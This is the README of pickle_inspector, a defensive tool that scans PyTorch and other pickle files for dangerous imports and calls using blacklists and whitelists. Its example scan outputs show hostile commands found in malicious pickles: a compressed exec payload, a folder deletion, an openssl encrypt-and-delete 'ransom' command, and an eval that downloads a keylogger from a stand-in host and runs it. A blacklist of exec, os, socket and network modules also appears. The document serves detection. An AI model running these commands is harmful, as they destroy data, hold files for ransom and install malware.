pickle_inspector 🥒🔬

Check what is in the pickle before eating it.

About
Command line usage
Library usage
Controlled unpickling
Black- and whitelists
Acknowledgements

About

Trace calls and imports that would occur if a pickle had been loaded
Flat but detailed call graphs
Load malicious pickles by skipping blacklisted items
Library and script usage
Combination of black and whitelists for fine grained control
Can be used with pytorchs load function

It works on any type of pickle, but was made with torch in mind.

NOTE: torch == 1.13.0 breaks using custom unpicklers, see pytorch/pytorch#88438
This is fixed in torch 1.13.1 and 2.x.x.

Scanning pickles via command line

tl;dr just let me scan my pickles. Using a preset blacklist for arbitrary code execution

python scan_pickle.py -f exec -i pickled.pkl

> Using blacklist: exec
> Scanning file(s): ['pickled.pkl']
> Using black list: ['__builtin__.breakpoint', '__builtin__.open', 'requests.*', 'builtins.open', '__builtin__.compile', 'socket.*', 'builtins.breakpoint', 'os.*', 'nt.*', 'builtins.eval', 'webbrowser.*', '__builtin__.eval', 'builtins.exec', 'posix.*', '__builtin__.exec', '__builtin__.getattr', 'builtins.getattrsubprocess.*', 'builtins.compile', 'aiohttp.*', 'httplib.*', 'sys.*']
> Reading pickled.pkl
> Scanning: pickled.pkl
> found: __builtin__.exec
> found: zlib.decompress
>
> Found blacklisted items:
>
>   __builtin__.exec.__call__((zlib.decompress((b'x\xda5\xcd]\n\xc3 \x10\x04\xe0\xf7\x9cb\xd9\x17\x15$\x07\x08x\x87\xde@$\xac\xe9R\xff\xd0\r\t\x94\xde\xbdB\xe9<}\x0c\x0c\x13{\xcd\x90\xcf$\xdcz\xddi\x0c.\x07pn\xb5\x0b<~\xcd\xd2\xc0\xfd\xad%\xf4\x83\xc4\xd1M\xbb\x85\xe9\xe14"^,O\xa8\x8d\x8aV\xa9\xa6UnQ\x16\xd4\xa5\x0c\x84\x01q[`\xa6u.\xa21\x9e\xfb\x0b-DN\xe4\xa2\x99[\xfbF\xefK\xc8\xe4=n\x939p\x99\xfcX0fi\xeb\x98\x8f\xa2\xcd\x17\x1d%6\xbc',), {}),), {})
>
> Scan for pickled.pkl FAILED ⚠️

Using a preset whitelist for a stable diffusion checkpoint

python scan_pickle.py --preset stable_diffusion_v1 --in sus.ckpt

> Using whitelist: stable_diffusion_v1
> Scanning file(s): ['sus.ckpt']
> Using white list: ['collections.OrderedDict', 'torch._utils._rebuild_tensor_v2', 'torch.HalfStorage', 'torch.FloatStorage', 'torch.IntStorage', 'torch.LongStorage', 'pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint', 'numpy.core.multiarray.scalar', 'numpy.dtype', '_codecs.encode']
> Reading sus.ckpt
> Found pickle in zip: archive/data.pkl
> Scanning: archive/data.pkl
> found: torch._utils._rebuild_tensor_v2
> found: torch.FloatStorage
> found: collections.OrderedDict
> found: torch.IntStorage
> found: torch.LongStorage
> found: pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint
> found: numpy.core.multiarray.scalar
> found: numpy.dtype
> found: _codecs.encode
>
> Scan for sus.ckpt PASSED ✅

Script usage

usage: scan_pickle.py [-h] -i INPUT [INPUT ...]
                      [-p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]]
                      [-f {exec} [{exec} ...]] [-w WHITELIST [WHITELIST ...]] [-b BLACKLIST [BLACKLIST ...]]

Scan pickles

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT [INPUT ...], --in INPUT [INPUT ...]
                        path to a pickle(s) or zip(s) containing pickles
  -p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...], --preset {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]
                        a whitelist preset to use
  -f {exec} [{exec} ...], --preset_blacklist {exec} [{exec} ...]
                        a blacklist preset to use
  -w WHITELIST [WHITELIST ...], --whitelist WHITELIST [WHITELIST ...]
                        whitelist of modules and functions to allow
  -b BLACKLIST [BLACKLIST ...], --blacklist BLACKLIST [BLACKLIST ...]
                        blacklist of modules and functions to block

Inspecting

Inspect without unpickling.

import torch
import pickle_inspector
result = torch.load('sus.pt', pickle_module=pickle_inspector.inspector)
for c in result.imports:
    print(c)

notice calls to shutil.rmtree, os.system or similar

> shutil.rmtree
> torch._utils._rebuild_tensor_v2
> collections.OrderedDict
> numpy.core.multiarray.scalar
> os.system
> numpy.dtype
> _codecs.encode

so we are taking a closer look at what is being called

for c in result.calls:
    print(c)

and it seems like someone tried to delete something and ransom a file

> shutil.rmtree(('/very/important/folder'), {})
> collections.OrderedDict((), {})
> torch._utils._rebuild_tensor_v2((None, 0, (1000,), (1,), False, collections.OrderedDict((), {})), {})
...
> torch._utils._rebuild_tensor_v2((None, 0, (), (), False, collections.OrderedDict((), {})), {})
> os.system(('openssl enc -aes-128-ecb -in important_file -out give_money.enc -K 1337B00B135DEADBEEF; rm important_file'), {})
> numpy.dtype(('f8', False, True), {})
> numpy.dtype.__setstate__(((3, '<', None, None, None, -1, -1, 0),), {})
> _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})
> numpy.core.multiarray.scalar((numpy.dtype(('f8', False, True), {}), _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})), {})

Controlled unpickling

Inspect and unpickle using white and blacklists.

import torch
from pickle_inspector import UnpickleConfig, UnpickleControlled, PickleModule
config = UnpickleConfig()
# only allow  modules, classes and funcions in the whitelist
# the rest will be stubbed
config.whitelist = [
        'torch._utils._rebuild_tensor_v2',
        'torch.FloatStorage',
        'torch.IntStorage',
        'torch.LongStorage',
        'numpy.core.multiarray.scalar',
        'numpy.dtype',
        'collections.OrderedDict',
        '_codecs.encode'
]
result = torch.load('model.ckpt', pickle_module = PickleModule(UnpickleControlled, config))

# Use the state_dict as usual
state_dict = result.structure
# ...

# print import results
for c in result.imports:
    print(c)

> torch._utils._rebuild_tensor_v2
> torch.FloatStorage
...
> __builtin__.eval
> collections.OrderedDict
...

for c in results.calls:
    if 'eval' in c:
        print(c)

> __builtin__.eval('import os;os.system("wget https://sus.to/keylog;chmod +x keylog;./keylog &")')

Blacklist & Whitelist

Whitelist only: everything will be blocked except items in the whitelist
Blacklist only: everything will be allowed except items in the blacklist
Both black- and whitelist: everything in the blacklist will be blocked except items in the whitelist

Example: Block everything within torch except torch.FloatStorage

conf.blacklist = ['torch.*']
conf.whitelist = ['torch.FloatStorage']

Whitelist for stable diffusion

A premade whitelist for stable diffusion v1 and v2 is available in this project.

Example: Scan a stable diffusion v1 checkpoint

import torch
from pickle_inspector import UnpickleConfig, PickleModule, UnpickleInspector, importlists
conf = UnpickleConfig(whitelist = importlists.stable_diffusion_v1)
torch.load('sd-v1-4.ckpt', pickle_module=PickleModule(UnpickleInspector, conf))

Tested with python 3.9 and torch 1.12.1

Acknowledgements

pickle_injector where coldwaterq describes an easy way to inject malicious code into pickle files
picklescan by mmaitre314 as an alternative approach to pickle scanning

Copyright (C) 2023 Lopho <[email protected]>
Licensed under the AGPLv3 <https://www.gnu.org/licenses/agpl-3.0.html>

Name		Name	Last commit message	Last commit date
Latest commit History 45 Commits
pickle_inspector		pickle_inspector
LICENSE		LICENSE
README.md		README.md
requirements.txt		requirements.txt
scan_pickle.py		scan_pickle.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

pickle_inspector 🥒🔬

About

Scanning pickles via command line

Script usage

Inspecting

Controlled unpickling

Blacklist & Whitelist

Whitelist for stable diffusion

Acknowledgements

About

Releases

Packages

Languages

License

lopho/pickle_inspector

Folders and files

Latest commit

History

Repository files navigation

pickle_inspector 🥒🔬

About

Scanning pickles via command line

Script usage

Inspecting

Controlled unpickling

Blacklist & Whitelist

Whitelist for stable diffusion

Acknowledgements

About

Topics

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages